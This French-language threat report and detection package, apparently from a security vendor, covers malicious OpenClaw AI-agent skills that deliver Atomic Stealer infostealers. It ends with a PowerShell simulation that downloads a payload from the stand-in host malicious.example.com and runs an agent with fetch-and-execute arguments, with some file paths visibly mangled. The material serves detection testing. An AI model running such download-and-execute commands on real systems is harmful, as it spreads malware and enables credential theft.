De l’Automatisation à l’Infection : Comment les Compétences de l’Agent IA OpenClaw Sont Armes
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
L’article explique comment les compétences malveillantes OpenClaw sont utilisées comme un mécanisme de diffusion de logiciels malveillants pour les utilisateurs de la plateforme d’agents IA autohébergée. Les acteurs menaçants publient des compétences qui semblent inoffensives mais finissent par inciter les victimes à télécharger et exécuter des binaires contrôlés par les attaquants à partir de sources externes. Les charges utiles observées comprennent des exécutables Windows et des fichiers macOS Mach-O qui ont été identifiés comme des variantes de la famille d’infostealers Atomic Stealer. Cette activité introduit un risque pratique pour la chaîne d’approvisionnement des stations de travail personnelles et de développement qui dépendent de compétences fournies par la communauté.
Enquête
VirusTotal Code Insight a examiné plus de trois mille compétences OpenClaw et a révélé des centaines qui montraient un comportement malveillant ou à haut risque. Dans un exemple, une compétence téléchargée par hightower6eu fournissait des instructions étape par étape pour télécharger une archive ZIP protégée par mot de passe depuis GitHub (mot de passe : openclaw) et exécuter openclaw-agent.exe sur Windows. Sur macOS, la même compétence dirigeait les utilisateurs vers un script encodé en Base64 depuis glot.io, téléchargeant ensuite un exécutable Mach-O pour exécution. Les binaires résultants ont été détectés par plusieurs moteurs de sécurité comme des infostealers truffés de chevaux de Troie.
Atténuation
Considérez les dépôts de compétences comme du code non fiable et exécutez OpenClaw dans un environnement sandboxé ou fortement contraint. Évitez de coller des commandes à partir de descriptions de compétences et n’exécutez pas de binaires récupérés à partir de liens externes non vérifiés. Pour les opérateurs de marché et de communauté, implémentez une analyse en temps de publication axée sur le comportement de téléchargement à distance, la logique de script obfusqué et les indicateurs de vol d’identifiants ou d’exfiltration de données. Dans les environnements d’entreprise, éduquez les utilisateurs sur les risques associés à l’installation de compétences communautaires et exigez une révision avant utilisation.
Réponse
Recherchez les paquets de compétences OpenClaw qui référencent des URL de téléchargement externes, des archives protégées par mot de passe ou des stagers de commandes encodés. Soyez vigilant sur l’exécution de binaires inconnus nommés openclaw-agent.exe et sur les lancements Mach-O suspects qui suivent une activité de téléchargement scriptée. Bloquez la connectivité aux domaines malveillants connus et isolez les systèmes impactés pour une analyse légale afin de confirmer si une exécution d’infostealer et une exposition d’identifiants ont eu lieu.
Flux d’attaque
Détections
Manipulation possible de chaînes encodées en Base64 [MacOS] (via cmdline)
Voir
Tentative d’exécution Curl suspecte [MacOS] (via cmdline)
Voir
Attributs du dossier Temp macOS Xattr ont été effacés (via process_creation)
Voir
Possible infiltration/exfiltration de données/C2 via les services/outils tiers (via proxy)
Voir
Possible infiltration/exfiltration de données/C2 via les services/outils tiers (via dns)
Voir
IOC (HashSha256) à détecter : De l’automatisation à l’infection : Comment les compétences OpenClaw AI Agent sont-elles armées
Voir
Exécution de charges utiles malveillantes via les compétences OpenClaw [Création de processus Linux]
Voir
Détection de l’exécution de l’agent OpenClaw malveillant [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : la vérification préliminaire de la télémétrie et de la ligne de base doit être réussie.
Rationnel : cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif de l’attaque et commandes :
Un attaquant a obtenu un accès initial à une station de travail victime et dépose le binaire malveillantopenclaw-agent.exedans le répertoire temporaire de l’utilisateur. Le binaire est exécuté avec une ligne de commande contenant explicitement les mots-cléstéléchargerandexécuterpour récupérer des charges utiles supplémentaires depuis un serveur C2 non fiable et les exécuter en mémoire. L’attaquant utilise une invite de commande Windows standard pour éviter les détections spécifiques à PowerShell, correspondant ainsi aux attentes de la règle Sigma.- Déposer la charge utile :
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Exécuter avec des arguments suspects :
"%TEMP%openclaw-agent.exe" télécharger http://malicious.example.com/payload.bin exécuter - L’agent contacte le serveur C2, télécharge
payload.bin, l’écrit sur le disque, et le lance, tout en gardant la ligne de commande du processus d’origine contenant les mots déclencheurs.
- Déposer la charge utile :
-
Script de test de régression :
# ----------------------------------------------------------------------- # Simulation d'exécution de l'agent OpenClaw – déclenche la détection Sigma # ----------------------------------------------------------------------- # 1. Téléchargez l'agent malveillant (simulé avec un fichier inoffensif) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # fichier inoffensif de remplacement $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Exécutez l'agent avec les mots-clés attendus en ligne de commande $cmd = "`"$agentPath`" télécharger http://malicious.example.com/payload.bin exécuter" Write-Host "Exécution : $cmd" Start-Process -FilePath $agentPath -ArgumentList "télécharger http://malicious.example.com/payload.bin exécuter" -NoNewWindow -Wait # 3. Facultatif : Simulez le téléchargement de la charge utile (bouchon inoffensif) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulation complète. Vérifiez SIEM pour détection." -
Commandes de nettoyage :
# Supprimez tous les artefacts créés pendant la simulation $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Supprimé $p" } }